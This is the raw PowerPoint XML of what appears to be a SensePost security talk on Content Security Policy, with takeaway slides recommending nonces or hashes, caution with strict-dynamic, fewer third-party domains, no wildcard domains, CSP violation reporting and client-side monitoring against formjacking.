                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or/and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="440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01896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D184D14-8D40-C321-94F1-54041258474F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323273" y="249382"/>
          <a:ext cx="11480800" cy="62530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28369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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510988" y="1438519"/>
            <a:ext cx="11170023" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strict-dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to reduce operational load, be aware of its risks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3900" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3900" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reduce allowed third-party domains and CDNs to a minimum. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3900" i="1" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When possible, host the libraries on your own domain.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="587196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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="1505501"/>
            <a:ext cx="11170023" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not include third-party domains with wildcards (e.g. *.amazonaws.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>report-to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>report-sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (noisy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Or available commercial solutions to monitor client-side JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(hint: Search for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>client-side protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>formjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>” in Google)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4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23118056"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{6950BFC3-D8DA-4A85-94F7-54DA5524770B}">
      <p188:commentRel xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main" r:id="rId3"/>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7E87D0-A5E0-40BE-04BA-84654E3427FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1318260" y="1441689"/>
            <a:ext cx="9555480" cy="1873514"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="14400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thank you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="A black and orange sign with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D33139F4-06A5-1387-D3DC-CE8A2C2C9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67" y="5767046"/>
            <a:ext cx="2048154" cy="597378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{432C6F1E-7FEE-DFC3-7EA7-5A67904DFB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638545" y="5925513"/>
            <a:ext cx="446351" cy="438912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 223360 w 446351"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 438912"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 446351"/>
              <a:gd name="connsiteY1" fmla="*/ 225020 h 438912"/>
              <a:gd name="connsiteX2" fmla="*/ 152728 w 446351"/>
              <a:gd name="connsiteY2" fmla="*/ 438486 h 438912"/>
              <a:gd name="connsiteX3" fmla="*/ 167888 w 446351"/>
              <a:gd name="connsiteY3" fmla="*/ 427687 h 438912"/>
              <a:gd name="connsiteX4" fmla="*/ 167523 w 446351"/>
              <a:gd name="connsiteY4" fmla="*/ 385958 h 438912"/>
              <a:gd name="connsiteX5" fmla="*/ 92450 w 446351"/>
              <a:gd name="connsiteY5" fmla="*/ 359134 h 438912"/>
              <a:gd name="connsiteX6" fmla="*/ 67670 w 446351"/>
              <a:gd name="connsiteY6" fmla="*/ 326353 h 438912"/>
              <a:gd name="connsiteX7" fmla="*/ 69152 w 446351"/>
              <a:gd name="connsiteY7" fmla="*/ 312569 h 438912"/>
              <a:gd name="connsiteX8" fmla="*/ 103547 w 446351"/>
              <a:gd name="connsiteY8" fmla="*/ 335666 h 438912"/>
              <a:gd name="connsiteX9" fmla="*/ 168629 w 446351"/>
              <a:gd name="connsiteY9" fmla="*/ 354293 h 438912"/>
              <a:gd name="connsiteX10" fmla="*/ 182683 w 446351"/>
              <a:gd name="connsiteY10" fmla="*/ 324117 h 438912"/>
              <a:gd name="connsiteX11" fmla="*/ 80988 w 446351"/>
              <a:gd name="connsiteY11" fmla="*/ 213096 h 438912"/>
              <a:gd name="connsiteX12" fmla="*/ 103912 w 446351"/>
              <a:gd name="connsiteY12" fmla="*/ 152746 h 438912"/>
              <a:gd name="connsiteX13" fmla="*/ 106134 w 446351"/>
              <a:gd name="connsiteY13" fmla="*/ 93136 h 438912"/>
              <a:gd name="connsiteX14" fmla="*/ 167518 w 446351"/>
              <a:gd name="connsiteY14" fmla="*/ 116234 h 438912"/>
              <a:gd name="connsiteX15" fmla="*/ 223360 w 446351"/>
              <a:gd name="connsiteY15" fmla="*/ 108781 h 438912"/>
              <a:gd name="connsiteX16" fmla="*/ 279198 w 446351"/>
              <a:gd name="connsiteY16" fmla="*/ 116234 h 438912"/>
              <a:gd name="connsiteX17" fmla="*/ 340587 w 446351"/>
              <a:gd name="connsiteY17" fmla="*/ 93136 h 438912"/>
              <a:gd name="connsiteX18" fmla="*/ 342804 w 446351"/>
              <a:gd name="connsiteY18" fmla="*/ 152746 h 438912"/>
              <a:gd name="connsiteX19" fmla="*/ 365733 w 446351"/>
              <a:gd name="connsiteY19" fmla="*/ 213096 h 438912"/>
              <a:gd name="connsiteX20" fmla="*/ 263667 w 446351"/>
              <a:gd name="connsiteY20" fmla="*/ 324117 h 438912"/>
              <a:gd name="connsiteX21" fmla="*/ 278828 w 446351"/>
              <a:gd name="connsiteY21" fmla="*/ 365841 h 438912"/>
              <a:gd name="connsiteX22" fmla="*/ 278462 w 446351"/>
              <a:gd name="connsiteY22" fmla="*/ 427682 h 438912"/>
              <a:gd name="connsiteX23" fmla="*/ 293623 w 446351"/>
              <a:gd name="connsiteY23" fmla="*/ 438490 h 438912"/>
              <a:gd name="connsiteX24" fmla="*/ 446351 w 446351"/>
              <a:gd name="connsiteY24" fmla="*/ 225020 h 438912"/>
              <a:gd name="connsiteX25" fmla="*/ 223360 w 446351"/>
              <a:gd name="connsiteY25"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6351" h="438912">
                <a:moveTo>
                  <a:pt x="223360" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="99848" y="0"/>
                  <a:pt x="0" y="100584"/>
                  <a:pt x="0" y="225020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="324488"/>
                  <a:pt x="63976" y="408686"/>
                  <a:pt x="152728" y="438486"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163824" y="440726"/>
                  <a:pt x="167888" y="433644"/>
                  <a:pt x="167888" y="427687"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167888" y="422470"/>
                  <a:pt x="167523" y="404589"/>
                  <a:pt x="167523" y="385958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105389" y="399372"/>
                  <a:pt x="92450" y="359134"/>
                  <a:pt x="92450" y="359134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82465" y="333056"/>
                  <a:pt x="67670" y="326353"/>
                  <a:pt x="67670" y="326353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47334" y="312569"/>
                  <a:pt x="69152" y="312569"/>
                  <a:pt x="69152" y="312569"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91710" y="314059"/>
                  <a:pt x="103547" y="335666"/>
                  <a:pt x="103547" y="335666"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123513" y="369938"/>
                  <a:pt x="155686" y="360254"/>
                  <a:pt x="168629" y="354293"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="170476" y="339763"/>
                  <a:pt x="176397" y="329704"/>
                  <a:pt x="182683" y="324117"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133128" y="318901"/>
                  <a:pt x="80988" y="299529"/>
                  <a:pt x="80988" y="213096"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80988" y="188508"/>
                  <a:pt x="89858" y="168391"/>
                  <a:pt x="103912" y="152746"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101695" y="147159"/>
                  <a:pt x="93927" y="124056"/>
                  <a:pt x="106134" y="93136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106134" y="93136"/>
                  <a:pt x="124994" y="87174"/>
                  <a:pt x="167518" y="116234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="185724" y="111308"/>
                  <a:pt x="204500" y="108802"/>
                  <a:pt x="223360" y="108781"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="242220" y="108781"/>
                  <a:pt x="261445" y="111392"/>
                  <a:pt x="279198" y="116234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="321727" y="87174"/>
                  <a:pt x="340587" y="93136"/>
                  <a:pt x="340587" y="93136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="352794" y="124056"/>
                  <a:pt x="345021" y="147159"/>
                  <a:pt x="342804" y="152746"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="357229" y="168391"/>
                  <a:pt x="365733" y="188508"/>
                  <a:pt x="365733" y="213096"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="365733" y="299529"/>
                  <a:pt x="313593" y="318526"/>
                  <a:pt x="263667" y="324117"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271805" y="331195"/>
                  <a:pt x="278828" y="344605"/>
                  <a:pt x="278828" y="365841"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278828" y="396017"/>
                  <a:pt x="278462" y="420234"/>
                  <a:pt x="278462" y="427682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278462" y="433644"/>
                  <a:pt x="282531" y="440726"/>
                  <a:pt x="293623" y="438490"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="382375" y="408681"/>
                  <a:pt x="446351" y="324488"/>
                  <a:pt x="446351" y="225020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="446716" y="100584"/>
                  <a:pt x="346503" y="0"/>
                  <a:pt x="223360" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="4568" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC17D567-CA8C-8BAA-8F3B-6640748F1F47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376468" y="5944913"/>
            <a:ext cx="4603243" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/sensepost/dresscode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA38D404-55A1-8741-D16F-5368611E7BA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376468" y="5402246"/>
            <a:ext cx="1639515" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@felmoltor</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F8D736-C199-3A34-7B1A-719172B235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3469" y="5381026"/>
            <a:ext cx="538208" cy="442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og Icon in Social">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09C83A0-7583-CC8F-8E48-0D878DE7C8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3371" y="4734734"/>
            <a:ext cx="538306" cy="53830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F13D1F31-9592-B5C5-DD8F-73F6F9745DDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376468" y="4819221"/>
            <a:ext cx="3325368" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://sensepost.com/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4107743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7"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|5.2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|32.7|6.9|4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|32.7|6.9|4"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
